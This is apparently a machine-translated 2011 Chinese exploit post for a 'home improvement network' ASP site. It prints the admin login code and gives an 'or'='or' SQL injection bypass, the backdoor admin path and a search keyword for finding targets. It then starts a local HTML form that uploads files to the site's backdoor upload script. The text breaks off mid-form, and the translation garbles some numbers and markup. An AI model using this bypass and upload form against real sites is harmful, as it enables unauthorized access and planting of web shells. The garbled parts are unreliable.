Home improvement network 0day a gold-bug warning-the black bar safety net

2011-03-10T00:00:00
ID MYHACK58:62201129681
Type myhack58
Reporter 佚名
Modified 2011-03-10T00:00:00

Description

Author: broken sword

Release date: 2011-03-08

Vulnerability type: file upload

Vulnerability file:gd_ChkLogin. asp

Vulnerability description:

I posted part of the code for analysis.

<%

dim user1,pass1,rs,sql

user1=trim(request("textfield")) "obtains input of a user name,the value assigned to user1"

pass1=trim(request("textfield2")) "obtains input of a password,the value assigned to the pass1"

"This way does not do any filtering"

if user1="" then

FoundErr=True

ErrMsg=ErrMsg & "<br><li>user name can not be empty!& lt;/li>"

end if

if pass1="" then

FoundErr=True

ErrMsg=ErrMsg & "<br><li>the password can not be empty!& lt;/li>"

end if

if not isnumeric(request. form("passcode")) then

FoundErr=True

ErrMsg=ErrMsg & "<br><li>verification code must be numeric, please fill in the correct!& lt;/li>"

else if Session("GetCode")<>Cint(request. form("passcode")) then

FoundErr=True

ErrMsg=ErrMsg & "<br><li>a verification code error, please fill in the correct!& lt;/li>"

end if

end if

if FoundErr=True then

call WriteErrMsg()

else

set rs=server. CreateObject("adodb. recordset")

sql="select * from admin_door where admin_user='"&amp; user1&"' and admin_pass='"&md5(pass1)&"'"

"Put user1 and pass1 to obtain the value directly into the query statement in the query"

rs. open sql,conn,1,1

if rs. bof and rs. eof then

FoundErr=True

ErrMsg=ErrMsg & "<br><li>username or password incorrect!& lt;/li>"

call WriteErrMsg()

else

SessionTimeout=4 0

session. Timeout=SessionTimeout

session("admin_name")=rs("admin_user")

session("admin_quanxian")=rs("admin_quanxian")'administrator privileges

'session("adminname")=rs("admin_user")

Response. redirect"default. asp"

end if

rs. close

set rs=nothing

end if

user1,pass1 does not perform any filtering. Lead backend you can use'or'='or'bypass.

Background address:/the backdoor/gd_login. asp

Exploit:

In the excavator in the Add /backdoor/gd_login. asp

Keywords:home improvement network (good keywords to your looking for)

'Or'='or'into the background. 将 下列 代码 本地 保存 为 canjian.html

<html>

<head>

<title>image upload</title>

<meta http-equiv="Content-Type" content="text/html; charset=gb2312">

<style type="text/css">

<!--

td{font-size:12px}

a{color:#0 0 0 0 0 0;text-decoration: none}

a:hover{text-decoration: underline}

. tx{height:16px;width:30px;border-color:black black #0 0 0 0 0 0;border-top-width:0px;border-right-width: 0px; border-bottom-width: 1px; border-left-width: 0px; font-size: 12px; background-color: #eeeeee; color: #0000FF}

. button{font-size:12px;border-top-width:0px;border-right-width:0px;border-bottom-width:0px;border-left-width: 0px; height: 16px; width: 80px; background-color: #eeeeee; cursor: hand}

. tx1{height:20px;width:30px;font-size:12px;border:1px solid;border-color:black black #0 0 0 0 0 0;color: #0000FF}

-->

</style>

<script language="javascript">

<!--

function mysub()

{

esave. style. visibility="visible";

}

-->

</script>

</head>

<body bgcolor="#FFFFFF" text="#0 0 0 0 0 0">

<form name="form1" method="post" action="http://www.xxx.com/backdoor/upload_asp.asp" enctype="multipart/form-data" >

<div id="esave" style="position:absolute; top:18px; left:40px; z-index:1 0; visibility:hidden">

<TABLE WIDTH=3 4 0 BORDER=0 CELLSPACING=0 CELLPADDING=0>

<TR><td width=2 0%></td>

<TD bgcolor=#104A7B width="6 0%">

<TABLE WIDTH=1 0 0% height=1 2 0 BORDER=0 CELLSPACING=1 CELLPADDING=0>

<TR>

<td bgcolor=#eeeeee align=center><font color=red>are uploading files, please wait...</font></td>

</tr>

</table>

</td><td width=2 0%></td>

</tr></table></div>

<table width="4 0 0" border="0" cellspacing="1" cellpadding="0" align="center" bgcolor="#D5D5D5">

<tr>

<td height="2 2" align="left" valign="middle" width="4 0 0"> image upload

[1] [2] next